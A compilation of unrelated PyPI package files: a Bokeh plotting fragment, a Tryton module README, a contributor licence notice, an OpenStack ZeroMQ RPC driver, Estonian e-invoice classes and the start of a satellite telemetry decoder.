fig2_circ_cv = fig2.circle("values_string", "cv", line_color="blue", fill_color="white", fill_alpha=1, size=8, source=source, legend=cv_text)
fig2_circ_cv.selection_glyph = Circle(line_color="blue", fill_color="white", line_width=2)
fig2_circ_cv.nonselection_glyph.line_color = "blue"
fig2_circ_cv.nonselection_glyph.fill_color = "white"
fig2_circ_cv.nonselection_glyph.line_alpha = 0.4
# Add hovertool and taptool
fig2.add_tools(HoverTool(renderers=[fig2_circ_full], tooltips=[(full_text, "@full_hover")], mode="vline"))
fig2.add_tools(HoverTool(renderers=[fig2_circ_cv], tooltips=[(cv_text, "@cv_hover")], mode="vline"))
fig2.add_tools(TapTool(renderers=[fig2_circ_full, fig2_circ_cv]))
# Figure 2: Extra formating
fig2.axis.major_label_text_font_size = "8pt"
if metric is "r2q2" or metric is "auc":
fig2.title.text_font_size = "12pt"
fig2.xaxis.axis_label_text_font_size = "10pt"
fig2.yaxis.axis_label_text_font_size = "10pt"
else:
fig2.title.text_font_size = "10pt"
fig2.xaxis.axis_label_text_font_size = "9pt"
fig2.yaxis.axis_label_text_font_size = "9pt"
# Figure 2: legend
if metric is "r2q2":
fig2.legend.location = "top_left"
else:
fig2.legend.location = "bottom_right"
# Create a grid and output figures
grid = np.full((1, 2), None)
grid[0, 0] = fig1
grid[0, 1] = fig2
fig = gridplot(grid.tolist(), merge_tools=True)
output_notebook()
show(fig)
|
PypiClean
|
/openlabs_stock_production_location-3.4.0.1.tar.gz/openlabs_stock_production_location-3.4.0.1/README.rst
|
Stock production location
=========================
Tryton production orders by default take inputs from the storage
zone of the warehouse where the production is happening. On assigning
the production order tries to pick the inputs from any sublocation of
the storage zone of the warehouse where the product is available.
While this feature is handy, there are businesses which have clearly
defined processes having the inventory in designated areas for designated
purposes. It might be crucial to limit access to the ``from location``
from where inputs could be picked and the ``to location`` to which the
output could be sent to.
Features
--------
1. Ability to configure default input and output zones for production
locations of a warehouse. For example, production location ``assembly``
could have the default input location as ``ready to finish`` and the
output location as ``Finished Goods``.
2. Ability to limit the locations from where the production order should
look for inventory for inputs instead of the whole warehouse.
I don't like what this module does!
-----------------------------------
Don't use it :-)
|
PypiClean
|
/stubmaker-0.0.3.tar.gz/stubmaker-0.0.3/CONTRIBUTING.md
|
# Notice to external contributors
## General info
Hello! In order for us (YANDEX LLC) to accept patches and other contributions from you, you will have to adopt our Yandex Contributor License Agreement (the “**CLA**”). The current version of the CLA can be found here:
1) https://yandex.ru/legal/cla/?lang=en (in English) and
2) https://yandex.ru/legal/cla/?lang=ru (in Russian).
By adopting the CLA, you state the following:
* You obviously wish and are willingly licensing your contributions to us for our open source projects under the terms of the CLA,
* You have read the terms and conditions of the CLA and agree with them in full,
* You are legally able to provide and license your contributions as stated,
* We may use your contributions for our open source projects and for any other project too,
* We rely on your assurances concerning the rights of third parties in relation to your contributions.
If you agree with these principles, please read and adopt our CLA. By providing us your contributions, you hereby declare that you have already read and adopt our CLA, and we may freely merge your contributions with our corresponding open source project and use it further in accordance with terms and conditions of the CLA.
## Provide contributions
If you have already adopted terms and conditions of the CLA, you are able to provide your contributions. When you submit your first pull request, please add the following information into it:
```
I hereby agree to the terms of the CLA available at: [link].
```
Replace the bracketed text as follows:
* [link] is the link to the current version of the CLA: https://yandex.ru/legal/cla/?lang=en (in English) or https://yandex.ru/legal/cla/?lang=ru (in Russian).
It is enough to provide this notification only once.
## Other questions
If you have any questions, please mail us at [email protected].
|
PypiClean
|
/virtual-storage-manager-2.0.2.tar.gz/virtual-storage-manager-2.0.2/vsm/openstack/common/rpc/impl_zmq.py
|
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import re
import socket
import sys
import types
import uuid
import eventlet
import greenlet
from oslo.config import cfg
from vsm.openstack.common import excutils
from vsm.openstack.common.gettextutils import _
from vsm.openstack.common import importutils
from vsm.openstack.common import jsonutils
from vsm.openstack.common import processutils as utils
from vsm.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# for convenience, are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('vsm.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
def _serialize(data):
"""
Serialization wrapper
We prefer using JSON, but it cannot encode all types.
Error if a developer passes us bad data.
"""
try:
return jsonutils.dumps(data, ensure_ascii=True)
except TypeError:
with excutils.save_and_reraise_exception():
LOG.error(_("JSON serialization failed."))
def _deserialize(data):
"""
Deserialization wrapper
"""
LOG.debug(_("Deserializing: %s"), data)
return jsonutils.loads(data)
class ZmqSocket(object):
"""
A tiny wrapper around ZeroMQ to simplify the send/recv protocol
and connection management.
Can be used as a Context (supports the 'with' statement).
"""
def __init__(self, addr, zmq_type, bind=True, subscribe=None):
self.sock = _get_ctxt().socket(zmq_type)
self.addr = addr
self.type = zmq_type
self.subscriptions = []
# Support failures on sending/receiving on wrong socket type.
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
self.can_sub = zmq_type in (zmq.SUB, )
# Support list, str, & None for subscribe arg (cast to list)
do_sub = {
list: subscribe,
str: [subscribe],
type(None): []
}[type(subscribe)]
for f in do_sub:
self.subscribe(f)
str_data = {'addr': addr, 'type': self.socket_s(),
'subscribe': subscribe, 'bind': bind}
LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
LOG.debug(_("-> bind: %(bind)s"), str_data)
try:
if bind:
self.sock.bind(addr)
else:
self.sock.connect(addr)
except Exception:
raise RPCException(_("Could not open socket."))
def socket_s(self):
"""Get socket type as string."""
t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
'DEALER')
return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]
def subscribe(self, msg_filter):
"""Subscribe."""
if not self.can_sub:
raise RPCException("Cannot subscribe on this socket.")
LOG.debug(_("Subscribing to %s"), msg_filter)
try:
self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
except Exception:
return
self.subscriptions.append(msg_filter)
def unsubscribe(self, msg_filter):
"""Unsubscribe."""
if msg_filter not in self.subscriptions:
return
self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
self.subscriptions.remove(msg_filter)
def close(self):
if self.sock is None or self.sock.closed:
return
# We must unsubscribe, or we'll leak descriptors.
if len(self.subscriptions) > 0:
for f in self.subscriptions:
try:
self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
except Exception:
pass
self.subscriptions = []
try:
# Default is to linger
self.sock.close()
except Exception:
# While this is a bad thing to happen,
# it would be much worse if some of the code calling this
# were to fail. For now, lets log, and later evaluate
# if we can safely raise here.
LOG.error("ZeroMQ socket could not be closed.")
self.sock = None
def recv(self):
if not self.can_recv:
raise RPCException(_("You cannot recv on this socket."))
return self.sock.recv_multipart()
def send(self, data):
if not self.can_send:
raise RPCException(_("You cannot send on this socket."))
self.sock.send_multipart(data)
class ZmqClient(object):
"""Client for ZMQ sockets."""
def __init__(self, addr, socket_type=None, bind=False):
if socket_type is None:
socket_type = zmq.PUSH
self.outq = ZmqSocket(addr, socket_type, bind=bind)
def cast(self, msg_id, topic, data, envelope=False):
msg_id = msg_id or 0
if not (envelope or rpc_common._SEND_RPC_ENVELOPE):
self.outq.send(map(bytes,
(msg_id, topic, 'cast', _serialize(data))))
return
rpc_envelope = rpc_common.serialize_msg(data[1], envelope)
zmq_msg = reduce(lambda x, y: x + y, rpc_envelope.items())
self.outq.send(map(bytes,
(msg_id, topic, 'impl_zmq_v2', data[0]) + zmq_msg))
def close(self):
self.outq.close()
class RpcContext(rpc_common.CommonRpcContext):
"""Context that supports replying to a rpc.call."""
def __init__(self, **kwargs):
self.replies = []
super(RpcContext, self).__init__(**kwargs)
def deepcopy(self):
values = self.to_dict()
values['replies'] = self.replies
return self.__class__(**values)
def reply(self, reply=None, failure=None, ending=False):
if ending:
return
self.replies.append(reply)
@classmethod
def marshal(self, ctx):
ctx_data = ctx.to_dict()
return _serialize(ctx_data)
@classmethod
def unmarshal(self, data):
return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
"""Used by ConsumerBase as a private context for - methods."""
def __init__(self, proxy):
self.proxy = proxy
self.msg_waiter = None
def _get_response(self, ctx, proxy, topic, data):
"""Process a curried message and cast the result to topic."""
LOG.debug(_("Running func with context: %s"), ctx.to_dict())
data.setdefault('version', None)
data.setdefault('args', {})
try:
result = proxy.dispatch(
ctx, data['version'], data['method'], **data['args'])
return ConsumerBase.normalize_reply(result, ctx.replies)
except greenlet.GreenletExit:
# ignore these since they are just from shutdowns
pass
except rpc_common.ClientException, e:
LOG.debug(_("Expected exception during message handling (%s)") %
e._exc_info[1])
return {'exc':
rpc_common.serialize_remote_exception(e._exc_info,
log_failure=False)}
except Exception:
LOG.error(_("Exception during message handling"))
return {'exc':
rpc_common.serialize_remote_exception(sys.exc_info())}
def reply(self, ctx, proxy,
msg_id=None, context=None, topic=None, msg=None):
"""Reply to a casted call."""
# Our real method is curried into msg['args']
child_ctx = RpcContext.unmarshal(msg[0])
response = ConsumerBase.normalize_reply(
self._get_response(child_ctx, proxy, topic, msg[1]),
ctx.replies)
LOG.debug(_("Sending reply"))
_multi_send(_cast, ctx, topic, {
'method': '-process_reply',
'args': {
'msg_id': msg_id, # Include for Folsom compat.
'response': response
}
}, _msg_id=msg_id)
class ConsumerBase(object):
"""Base Consumer."""
def __init__(self):
self.private_ctx = InternalContext(None)
@classmethod
def normalize_reply(self, result, replies):
#TODO(ewindisch): re-evaluate and document this method.
if isinstance(result, types.GeneratorType):
return list(result)
elif replies:
return replies
else:
return [result]
def process(self, proxy, ctx, data):
data.setdefault('version', None)
data.setdefault('args', {})
# Method starting with - are
# processed internally. (non-valid method name)
method = data.get('method')
if not method:
LOG.error(_("RPC message did not include method."))
return
# Internal method
# uses internal context for safety.
if method == '-reply':
self.private_ctx.reply(ctx, proxy, **data['args'])
return
proxy.dispatch(ctx, data['version'],
data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
"""
A consumer class implementing a
centralized casting broker (PULL-PUSH)
for RoundRobin requests.
"""
def __init__(self, conf):
super(ZmqBaseReactor, self).__init__()
self.mapping = {}
self.proxies = {}
self.threads = []
self.sockets = []
self.subscribe = {}
self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)
def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
zmq_type_out=None, in_bind=True, out_bind=True,
subscribe=None):
LOG.info(_("Registering reactor"))
if zmq_type_in not in (zmq.PULL, zmq.SUB):
raise RPCException("Bad input socktype")
# Items push in.
inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
subscribe=subscribe)
self.proxies[inq] = proxy
self.sockets.append(inq)
LOG.info(_("In reactor registered"))
if not out_addr:
return
if zmq_type_out not in (zmq.PUSH, zmq.PUB):
raise RPCException("Bad output socktype")
# Items push out.
outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)
self.mapping[inq] = outq
self.mapping[outq] = inq
self.sockets.append(outq)
LOG.info(_("Out reactor registered"))
def consume_in_thread(self):
def _consume(sock):
LOG.info(_("Consuming socket"))
while True:
self.consume(sock)
for k in self.proxies.keys():
self.threads.append(
self.pool.spawn(_consume, k)
)
def wait(self):
for t in self.threads:
t.wait()
def close(self):
for s in self.sockets:
s.close()
for t in self.threads:
t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
def __init__(self, conf):
super(ZmqProxy, self).__init__(conf)
pathsep = set((os.path.sep or '', os.path.altsep or '', '/', '\\'))
self.badchars = re.compile(r'[%s]' % re.escape(''.join(pathsep)))
self.topic_proxy = {}
def consume(self, sock):
ipc_dir = CONF.rpc_zmq_ipc_dir
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
topic = data[1]
LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))
if topic.startswith('fanout~'):
sock_type = zmq.PUB
topic = topic.split('.', 1)[0]
elif topic.startswith('zmq_replies'):
sock_type = zmq.PUB
else:
sock_type = zmq.PUSH
if topic not in self.topic_proxy:
def publisher(waiter):
LOG.info(_("Creating proxy for topic: %s"), topic)
try:
# The topic is received over the network,
# don't trust this input.
if self.badchars.search(topic) is not None:
emsg = _("Topic contained dangerous characters.")
LOG.warn(emsg)
raise RPCException(emsg)
out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
(ipc_dir, topic),
sock_type, bind=True)
except RPCException:
waiter.send_exception(*sys.exc_info())
return
self.topic_proxy[topic] = eventlet.queue.LightQueue(
CONF.rpc_zmq_topic_backlog)
self.sockets.append(out_sock)
# It takes some time for a pub socket to open,
# before we can have any faith in doing a send() to it.
if sock_type == zmq.PUB:
eventlet.sleep(.5)
waiter.send(True)
while(True):
data = self.topic_proxy[topic].get()
out_sock.send(data)
LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
{'data': data})
wait_sock_creation = eventlet.event.Event()
eventlet.spawn(publisher, wait_sock_creation)
try:
wait_sock_creation.wait()
except RPCException:
LOG.error(_("Topic socket file creation failed."))
return
try:
self.topic_proxy[topic].put_nowait(data)
LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
{'data': data})
except eventlet.queue.Full:
LOG.error(_("Local per-topic backlog buffer full for topic "
"%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
with excutils.save_and_reraise_exception():
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
with excutils.save_and_reraise_exception():
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
super(ZmqProxy, self).consume_in_thread()
def unflatten_envelope(packenv):
"""Unflattens the RPC envelope.
Takes a list and returns a dictionary.
i.e. [1,2,3,4] => {1: 2, 3: 4}
"""
i = iter(packenv)
h = {}
try:
while True:
k = i.next()
h[k] = i.next()
except StopIteration:
return h
class ZmqReactor(ZmqBaseReactor):
"""
A consumer class implementing a
consumer for messages. Can also be
used as a 1:1 proxy
"""
def __init__(self, conf):
super(ZmqReactor, self).__init__(conf)
def consume(self, sock):
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
if sock in self.mapping:
LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
'data': data})
self.mapping[sock].send(data)
return
proxy = self.proxies[sock]
if data[2] == 'cast': # Legacy protocol
packenv = data[3]
ctx, msg = _deserialize(packenv)
request = rpc_common.deserialize_msg(msg)
ctx = RpcContext.unmarshal(ctx)
elif data[2] == 'impl_zmq_v2':
packenv = data[4:]
msg = unflatten_envelope(packenv)
request = rpc_common.deserialize_msg(msg)
# Unmarshal only after verifying the message.
ctx = RpcContext.unmarshal(data[3])
else:
LOG.error(_("ZMQ Envelope version unsupported or unknown."))
return
self.pool.spawn_n(self.process, proxy, ctx, request)
class Connection(rpc_common.Connection):
"""Manages connections and threads."""
def __init__(self, conf):
self.topics = []
self.reactor = ZmqReactor(conf)
def create_consumer(self, topic, proxy, fanout=False):
# Register with matchmaker.
_get_matchmaker().register(topic, CONF.rpc_zmq_host)
# Subscription scenarios
if fanout:
sock_type = zmq.SUB
subscribe = ('', fanout)[type(fanout) == str]
topic = 'fanout~' + topic.split('.', 1)[0]
else:
sock_type = zmq.PULL
subscribe = None
topic = '.'.join((topic.split('.', 1)[0], CONF.rpc_zmq_host))
if topic in self.topics:
LOG.info(_("Skipping topic registration. Already registered."))
return
# Receive messages from (local) proxy
inaddr = "ipc://%s/zmq_topic_%s" % \
(CONF.rpc_zmq_ipc_dir, topic)
LOG.debug(_("Consumer is a zmq.%s"),
['PULL', 'SUB'][sock_type == zmq.SUB])
self.reactor.register(proxy, inaddr, sock_type,
subscribe=subscribe, in_bind=False)
self.topics.append(topic)
def close(self):
_get_matchmaker().stop_heartbeat()
for topic in self.topics:
_get_matchmaker().unregister(topic, CONF.rpc_zmq_host)
self.reactor.close()
self.topics = []
def wait(self):
self.reactor.wait()
def consume_in_thread(self):
_get_matchmaker().start_heartbeat()
self.reactor.consume_in_thread()
def _cast(addr, context, topic, msg, timeout=None, envelope=False,
_msg_id=None):
timeout_cast = timeout or CONF.rpc_cast_timeout
payload = [RpcContext.marshal(context), msg]
with Timeout(timeout_cast, exception=rpc_common.Timeout):
try:
conn = ZmqClient(addr)
# assumes cast can't return an exception
conn.cast(_msg_id, topic, payload, envelope)
except zmq.ZMQError:
raise RPCException("Cast failed. ZMQ Socket Exception")
finally:
if 'conn' in vars():
conn.close()
def _call(addr, context, topic, msg, timeout=None,
envelope=False):
# timeout_response is how long we wait for a response
timeout = timeout or CONF.rpc_response_timeout
# The msg_id is used to track replies.
msg_id = uuid.uuid4().hex
# Replies always come into the reply service.
reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
LOG.debug(_("Creating payload"))
# Curry the original request into a reply method.
mcontext = RpcContext.marshal(context)
payload = {
'method': '-reply',
'args': {
'msg_id': msg_id,
'context': mcontext,
'topic': reply_topic,
'msg': [mcontext, msg]
}
}
LOG.debug(_("Creating queue socket for reply waiter"))
# Messages arriving async.
# TODO(ewindisch): have reply consumer with dynamic subscription mgmt
with Timeout(timeout, exception=rpc_common.Timeout):
try:
msg_waiter = ZmqSocket(
"ipc://%s/zmq_topic_zmq_replies.%s" %
(CONF.rpc_zmq_ipc_dir,
CONF.rpc_zmq_host),
zmq.SUB, subscribe=msg_id, bind=False
)
LOG.debug(_("Sending cast"))
_cast(addr, context, topic, payload, envelope)
LOG.debug(_("Cast sent; Waiting reply"))
# Blocks until receives reply
msg = msg_waiter.recv()
LOG.debug(_("Received message: %s"), msg)
LOG.debug(_("Unpacking response"))
if msg[2] == 'cast': # Legacy version
raw_msg = _deserialize(msg[-1])[-1]
elif msg[2] == 'impl_zmq_v2':
rpc_envelope = unflatten_envelope(msg[4:])
raw_msg = rpc_common.deserialize_msg(rpc_envelope)
else:
raise rpc_common.UnsupportedRpcEnvelopeVersion(
_("Unsupported or unknown ZMQ envelope returned."))
responses = raw_msg['args']['response']
# ZMQError trumps the Timeout error.
except zmq.ZMQError:
raise RPCException("ZMQ Socket Error")
except (IndexError, KeyError):
raise RPCException(_("RPC Message Invalid."))
finally:
if 'msg_waiter' in vars():
msg_waiter.close()
# It seems we don't need to do all of the following,
# but perhaps it would be useful for multicall?
# One effect of this is that we're checking all
# responses for Exceptions.
for resp in responses:
if isinstance(resp, types.DictType) and 'exc' in resp:
raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None,
envelope=False, _msg_id=None):
"""
Wraps the sending of messages,
dispatches to the matchmaker and sends
message to all relevant hosts.
"""
conf = CONF
LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
queues = _get_matchmaker().queues(topic)
LOG.debug(_("Sending message(s) to: %s"), queues)
# Don't stack if we have no matchmaker results
if len(queues) == 0:
LOG.warn(_("No matchmaker results. Not casting."))
# While not strictly a timeout, callers know how to handle
# this exception and a timeout isn't too big a lie.
raise rpc_common.Timeout(_("No match from matchmaker."))
# This supports brokerless fanout (addresses > 1)
for queue in queues:
(_topic, ip_addr) = queue
_addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
if method.__name__ == '_cast':
eventlet.spawn_n(method, _addr, context,
_topic, msg, timeout, envelope,
_msg_id)
return
return method(_addr, context, _topic, msg, timeout,
envelope)
def create_connection(conf, new=True):
return Connection(conf)
def multicall(conf, *args, **kwargs):
"""Multiple calls."""
return _multi_send(_call, *args, **kwargs)
def call(conf, *args, **kwargs):
"""Send a message, expect a response."""
data = _multi_send(_call, *args, **kwargs)
return data[-1]
def cast(conf, *args, **kwargs):
"""Send a message expecting no reply."""
_multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
"""Send a message to all listening and expect no reply."""
# NOTE(ewindisch): fanout~ is used because it avoid splitting on .
# and acts as a non-subtle hint to the matchmaker and ZmqProxy.
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs)
def notify(conf, context, topic, msg, envelope):
"""
Send notification event.
Notifications are sent to topic-priority.
This differs from the AMQP drivers which send to topic.priority.
"""
# NOTE(ewindisch): dot-priority in rpc notifier does not
# work with our assumptions.
topic = topic.replace('.', '-')
cast(conf, context, topic, msg, envelope=envelope)
def cleanup():
"""Clean up resources in use by implementation."""
global ZMQ_CTX
if ZMQ_CTX:
ZMQ_CTX.term()
ZMQ_CTX = None
global matchmaker
matchmaker = None
def _get_ctxt():
if not zmq:
raise ImportError("Failed to import eventlet.green.zmq")
global ZMQ_CTX
if not ZMQ_CTX:
ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
return ZMQ_CTX
def _get_matchmaker(*args, **kwargs):
global matchmaker
if not matchmaker:
matchmaker = importutils.import_object(
CONF.rpc_zmq_matchmaker, *args, **kwargs)
return matchmaker
|
PypiClean
|
/estonian_e_invoice-1.0.1.tar.gz/estonian_e_invoice-1.0.1/estonian_e_invoice/entities/account.py
|
from decimal import Decimal
from typing import Optional
from estonian_e_invoice.entities.common import Node
from estonian_e_invoice.validation.validation_schemas import (
ACCOUNT_INFO_SCHEMA,
PAYMENT_INFO_SCHEMA,
)
class AccountInfo(Node):
"""
Describes the accounts of a party.
account_number: Account number in local banking system.
iban: International Banking Account Number.
bic: Bank identification code (SWIFT code).
bank_name: The name of the bank.
"""
tag = "AccountInfo"
validation_schema = ACCOUNT_INFO_SCHEMA
def __init__(
self,
account_number: str,
iban: Optional[str] = None,
bic: Optional[str] = None,
bank_name: Optional[str] = None,
) -> None:
self.elements = self.validate(
{
"AccountNumber": account_number,
"IBAN": iban,
"BIC": bic,
"BankName": bank_name,
}
)
class PaymentInfo(Node):
"""
Describes the information used for generating payment order form from the invoice.
currency: Three-character currency code as specified in ISO 4217.
payment_description: Description of the payment.
payable: Whether this bill needs to be paid or not. Payment due date is mandatory if payable.
payment_total_sum: Total amount of the payment.
payer_name: Name of the payer.
payment_id: Invoice number.
pay_to_account: The beneficiary’s account number.
pay_to_name: The beneficiary’s name.
pay_due_date: Payment due date.
"""
tag = "PaymentInfo"
validation_schema = PAYMENT_INFO_SCHEMA
def __init__(
self,
currency: str,
payment_description: str,
payable: bool,
payment_total_sum: Decimal,
payer_name: str,
payment_id: str,
pay_to_account: str,
pay_to_name: str,
pay_due_date: Optional[str] = None,
) -> None:
self.elements = self.validate(
{
"Currency": currency,
"PaymentDescription": payment_description,
"Payable": payable,
"PaymentTotalSum": payment_total_sum,
"PayerName": payer_name,
"PaymentId": payment_id,
"PayToAccount": pay_to_account,
"PayToName": pay_to_name,
"PayDueDate": pay_due_date,
}
)
|
PypiClean
|
/satnogs_decoders-1.60.0-py3-none-any.whl/satnogsdecoders/decoder/armadillo.py
|
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class Armadillo(KaitaiStruct):
""":field dest_callsign: ax25_frame.ax25_header.dest_callsign_raw.callsign_ror.callsign
:field src_callsign: ax25_frame.ax25_header.src_callsign_raw.callsign_ror.callsign
:field src_ssid: ax25_frame.ax25_header.src_ssid_raw.ssid
:field dest_ssid: ax25_frame.ax25_header.dest_ssid_raw.ssid
:field ctl: ax25_frame.ax25_header.ctl
:field pid: ax25_frame.payload.pid
:field time_since_epoch: ax25_frame.payload.data_payload.time_since_epoch
:field uptime: ax25_frame.payload.data_payload.uptime
:field avail_nvmem: ax25_frame.payload.data_payload.avail_nvmem
:field pos_x: ax25_frame.payload.data_payload.pos_x
:field pos_y: ax25_frame.payload.data_payload.pos_y
:field pos_z: ax25_frame.payload.data_payload.pos_z
:field vel_x: ax25_frame.payload.data_payload.vel_x
:field vel_y: ax25_frame.payload.data_payload.vel_y
:field vel_z: ax25_frame.payload.data_payload.vel_z
:field pwr_states_reserved: ax25_frame.payload.data_payload.pwr_states_reserved
:field gps_power: ax25_frame.payload.data_payload.gps_power
:field adc_power: ax25_frame.payload.data_payload.adc_power
:field antenna_power: ax25_frame.payload.data_payload.antenna_power
:field pdd_power: ax25_frame.payload.data_payload.pdd_power
:field spacecraft_mode: ax25_frame.payload.data_payload.spacecraft_mode
:field vbatt: ax25_frame.payload.data_payload.vbatt
:field input_current: ax25_frame.payload.data_payload.input_current
:field output_current: ax25_frame.payload.data_payload.output_current
:field boot_count: ax25_frame.payload.data_payload.boot_count
:field boot_cause: ax25_frame.payload.data_payload.boot_cause
:field eps_temp_1: ax25_frame.payload.data_payload.eps_temp_1
:field eps_temp_2: ax25_frame.payload.data_payload.eps_temp_2
:field eps_temp_3: ax25_frame.payload.data_payload.eps_temp_3
:field eps_temp_4: ax25_frame.payload.data_payload.eps_temp_4
:field eps_bp4a: ax25_frame.payload.data_payload.eps_bp4a
:field eps_bp4b: ax25_frame.payload.data_payload.eps_bp4b
:field eps_output_1_current: ax25_frame.payload.data_payload.eps_output_1_current
:field eps_output_2_current: ax25_frame.payload.data_payload.eps_output_2_current
:field eps_output_3_current: ax25_frame.payload.data_payload.eps_output_3_current
:field eps_output_4_current: ax25_frame.payload.data_payload.eps_output_4_current
:field eps_output_5_current: ax25_frame.payload.data_payload.eps_output_5_current
:field eps_output_6_current: ax25_frame.payload.data_payload.eps_output_6_current
:field rxwl_temp_x: ax25_frame.payload.data_payload.rxwl_temp_x
:field rxwl_temp_y: ax25_frame.payload.data_payload.rxwl_temp_y
:field rxwl_temp_z: ax25_frame.payload.data_payload.rxwl_temp_z
:field gyro_temp_x: ax25_frame.payload.data_payload.gyro_temp_x
:field gyro_temp_y: ax25_frame.payload.data_payload.gyro_temp_y
:field gyro_temp_z: ax25_frame.payload.data_payload.gyro_temp_z
:field desired_quaternion_a: ax25_frame.payload.data_payload.desired_quaternion_a
:field desired_quaternion_b: ax25_frame.payload.data_payload.desired_quaternion_b
:field desired_quaternion_c: ax25_frame.payload.data_payload.desired_quaternion_c
:field desired_quaternion_d: ax25_frame.payload.data_payload.desired_quaternion_d
:field estimated_quaternion_a: ax25_frame.payload.data_payload.estimated_quaternion_a
:field estimated_quaternion_b: ax25_frame.payload.data_payload.estimated_quaternion_b
:field estimated_quaternion_c: ax25_frame.payload.data_payload.estimated_quaternion_c
:field estimated_quaternion_d: ax25_frame.payload.data_payload.estimated_quaternion_d
:field rotation_rate_x: ax25_frame.payload.data_payload.rotation_rate_x
:field rotation_rate_y: ax25_frame.payload.data_payload.rotation_rate_y
:field rotation_rate_z: ax25_frame.payload.data_payload.rotation_rate_z
:field sun_sensor_address: ax25_frame.payload.data_payload.sun_sensor_address
:field message: ax25_frame.payload.data_payload.message
"""
class BootCauses(Enum):
unknown_reset = 0
dedicated_wdt_reset = 1
i2c_wdt_reset = 2
hard_reset = 3
soft_reset = 4
stack_overflow = 5
timer_overflow = 6
brownout_or_power_on_reset = 7
internal_wdt_reset = 8
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.ax25_frame = Armadillo.Ax25Frame(self._io, self, self._root)
class Ax25Frame(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
